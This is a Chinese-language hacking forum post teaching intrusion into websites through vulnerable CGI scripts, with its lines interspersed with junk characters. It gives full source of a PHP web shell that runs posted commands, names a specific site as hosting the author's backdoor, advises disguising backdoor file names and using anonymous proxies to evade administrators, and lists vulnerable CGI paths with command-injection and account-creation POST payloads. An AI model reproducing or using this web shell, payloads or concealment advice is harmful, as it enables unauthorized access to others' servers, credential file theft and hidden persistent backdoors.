CGI 脚本入侵快速上手+脚本使用方法

admin

CGI 脚本入侵快速上手+脚本使用方法
6 G* ?/ A- T" q/ R2 o大家好 我是bboyhip  只是一名菜菜的exploiter
6 b9 K4 T8 k- Z  c4 ~很开心来到贵论坛
这里让我感觉 很有技术交流的感觉
我会长长来玩的
前言:
以下讲解针对欧美日本网站
當我們在做滲透分析的時候 方法有很多
# ?1 M" h0 Z& v9 B: R我门都知道 国外伺服器大多是linux 平台
* X' g/ a0 R7 s) Q% k' _7 a% |1 O- i所以有很多网站程序有6成都会使用cgi 脚本来管理
- `- n, Q' E9 H) T0 H目录为/cgi-bin/
* v4 f) `/ R) p
只是个人在实务上一些经验
; @4 i1 e- |3 p  Z# h& H写的不好 请多多见谅喔
在这里我简单分为几个部份一定要會的
讲解一下
" c. Y$ G( w+ E5 t" @1 c! D让没有基础的人很容易上手
+ `5 F% c. C- o2 u# m; h  `  e
/ ^# \/ S( ~1 k; l7 G) D! Z* l以下内容跟帖回复才能看到
) k8 f) s6 z9 b8 S) }( ^==============================
# {1 g) o! E  P
7 Q% q0 N: @4 }- Z0 b* J* x1 S( i第1部份: 何谓Shell?
, z+ `! ~" e# q  zShell的中文, 可称为 "壳".  Shell 是一个比较复杂的概念, 先看比较传统的解释:
A shell is the program which reads user input from the command line and executes actions based upon that input.
1 L0 P9 r" y' O5 o+ H. W) H意思是, 通过应用程式(shell), 用户输入指令, 由系统执行该指令.

$ B4 S$ H- {9 |  I3 ?( ~7 v- y, D: m对於黑客来说, shell是後门, 是入侵/ 控制/ 浏览对方系统的程式/ 方法.  
8 d+ c# L( Q8 p1 c, {, ]5 ^要自行建立一个shell是十分困难的, 因为要先找漏洞, 找到後, 利用该漏洞来写入档案/ 後门.  大家都知道, 有些漏洞只可加码, 有些可读档, 但可以写档的不多.  在数年前, 有一个十分流行及易用的漏洞addpasswd.cgi, 可以写後门, 但时至今日, 绝大部份的addpasswd.cgi已经被删除.
所以, 对於入门的exploiter来说, 先收集别人的後门, 多多练习, 然後再学习做自己的shell.

第2部份: Unix 指令
以下是一些常见及重要的指令:
  J& O% \& k% l; [: Jpwd: 显示当前目录, 即是後门/程式所在的位置
如 /home/www/site.com/cgi-bin/
ls: 列出档案 (-a 包含隐藏档; -l 包含详细资料).  
ls -al :详细列出档案资料(当前目录)
# W  a6 h- m) m- S2 zls /: 列出根目录
1 c5 n% ]% N# y: G- nls /etc: 列出/etc的资料夹及档案
. P% m7 B. h8 {1 W6 ~" }0 \ls ../ -al: 详细列出上一层的资料夹及档案
, S0 S1 Y0 L7 g" y3 c8 Tcat: 显示档案内容
2 j4 R% Q2 B' R5 |) hcat .htpasswd: 显示 .htpasswd 这个档案的内容(当前目录)
cat /etc/passwd: 显示 /etc/passwd 这个档案的内容
who: 显示谁login 至系统
man: 显示指令用法  
6 B/ ]% |7 q5 `; f% J* oman ls: 显示ls这指令的用法  
, H! U6 V: F6 Q* }5 zmkdir 建立目录
, W8 W2 d6 P* l0 krmdir 删除目录
mv 移动档案
rm 删除档案

第3部份: Shell的使用
/ H8 r# K. e; {' {) \- T9 }6 O; h, m/ Y例如:
( H: V6 G) e6 ~$ _http://site.com/refer.php
这是我的後门, 原代码如下:
9 |& F  ^& H$ L5 D& O' b<Form Action="#" Method="POST">
<Input type="text" name="cmd">
<Input type="Submit">
</Form>
( A) w& d1 s2 @# W+ F7 p# ]<?php
) i5 }4 \( t6 X1 H- D" w$cmd = $_POST['cmd'];
$Output = shell_exec($cmd);
echo $Output;
* m' h. ?! W& a, S2 l: t?>
输入pwd, 可得到绝对路径:
2 A: v; Y% G  H0 I" C/home/htdocs/users/jnesbitt/jnesbitt/nylonfantasies.com

第4部份: 注意事项
2 o. l0 ~! J$ h- 使用匿名代理, 保障自己
- v! u6 r/ u0 \! }- k- 不可恶意破坏, 或更改现有档案, 否则管理员发现了, 不但会删除後门, 可能会有追究行动
- 加後门前, 必须了解目标系统是否支援.  例如, cgi後门, 应放在cgi-bin; 有些系统可能不支援 php後门等.
- 加後门前 (如 index.php), 先检查是否已存在该档案名称, 以免覆盖原有档案, 造成破坏.
8 q1 t5 o' ]. Z' D( y6 F- 後门的名称, 不可使用hack, crack, exploit等字眼, 最好使用index, index1, log, login, refer, tmp, test, info等, 鱼目混珠,
) h: k9 k- P4 h- V! J8 B* E不容易被发现.
- 将後门放在比较隐闭的地方 (例如 /cgi-bin/内, 有很多cgi档案, 比较少php档案)
针对网站的渗透分析方法太多了
这篇文章的重点是cgi 脚本攻击
* D- ^9 Q. H4 }0 E% w所以我用简单的叙述形容
+ R0 [( b" |" i开始讲解脚本入侵过程:
在这里提供一些方法思路让大家学习一下
( b  k# L; D/ P: ]% U. s
5 C; e# B( s+ n6 u, s  z  Z$ m1.一开始对一个网站进行cgi漏洞扫描
我们需要的东西有
扫洞工具 如:triton..等等
3 m, e$ S( Z$ i0 m# nE表
/ e' h9 N" l3 P5 j" y如
3 l/ C; J) n, S5 I) Q, p: R/cgi-bin/add-passwd.cgi
/WebShop/templates/cc.txt
9 B- E9 {& V+ j4 P/Admin_files/order.log
/orders/mountain.cfg
/cgi-sys/cart.pl
/scripts/cart.pl
/htbin/cart.pl
6 p& `$ P; D; O) h/ o8 K3 R* NE表来源可以是网路收寻或是自己的0 day
* T  s+ Z4 m* a$ s2 ^$ B& z
1 ^$ w* I+ L$ K3 D3 o2.怎样确认扫到的洞 是真的还假的?
1 Z+ g' v7 o9 P: |6 g' K举例: target: http://www.site.com/cgi-bin/add-passwd.cgi
" o; F3 n1 ]- E一般都是在IE里先看一下的,记住这个返回码哦
ERROR:This script should be referenced with a METHOD of POST.
" }# I) t7 H, x3 f: }: t, \4 V没有返回一定是假的
  U8 h" v) _7 X  S( `4 g0 h% t3.重来来了 很多人都会问我
, Q! g# V7 ~! |* o1 W4 r9 D) U6 S他扫到很多洞 但是不会使用
9 X2 t- O- S/ u因为这些漏洞 使用的语法 称为post
+ \" @3 h  Z$ c$ y我们要找post 的方法很多
可以是源代码分析 找出介质
或是用抓包工具 抓他的语法...等等

. y+ w# D0 q: r8 t% W0 l& J+ k以下我提供10个 cgi 洞以及使用方法post
让大家可以针对网站去做扫描  
/index.cgi
4 }; A% Z- S1 Q6 Bwei=ren&gen=command
! Q$ [8 o3 k8 J" y1 K' q7 ^/passmaster.cgi
8 U" h% G* _' M: B0 H% ZAction=Add&Username=Username&Password=Password
( \/ Y5 c# F+ l5 q/accountcreate.cgi
/ Y6 H/ X$ J" [: A% Pusername=username&password=password&ref1=|echo;ls|
: V8 _4 S$ b4 E7 `6 o1 F/form.cgi
8 \+ Q/ g% l  v+ x0 ~name=xxxx&email=email&subject=xxxx&response=|echo;ls|
/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password
/ccbill-local.asp
; M; v+ b7 I: z7 V3 p2 Q& c" U3 cpost_values=username:password
3 T+ N: |5 X  \: \3 S* H/count.cgi
pinfile=|echo;ls -la;exit|
/recon.cgi
% H! Y5 _/ x. m0 Q) ~( B/recon.cgi?search
' v1 p3 u- u. k+ \+ ?3 asearchoption=1&searchfor=|echo;ls -al;exit|
/verotelrum.pl
vercode=username:password:dseegsow:add:amount<&30>
/af.cgi_browser_out=|echo;ls -la;exit;|
2 o' r8 \6 ^/ Q8 V  Z
0 R/ |1 w) ]5 l  w, S5 f$ m- F今天就讲到这  感谢大家支持
& |1 c( |$ U$ V3 k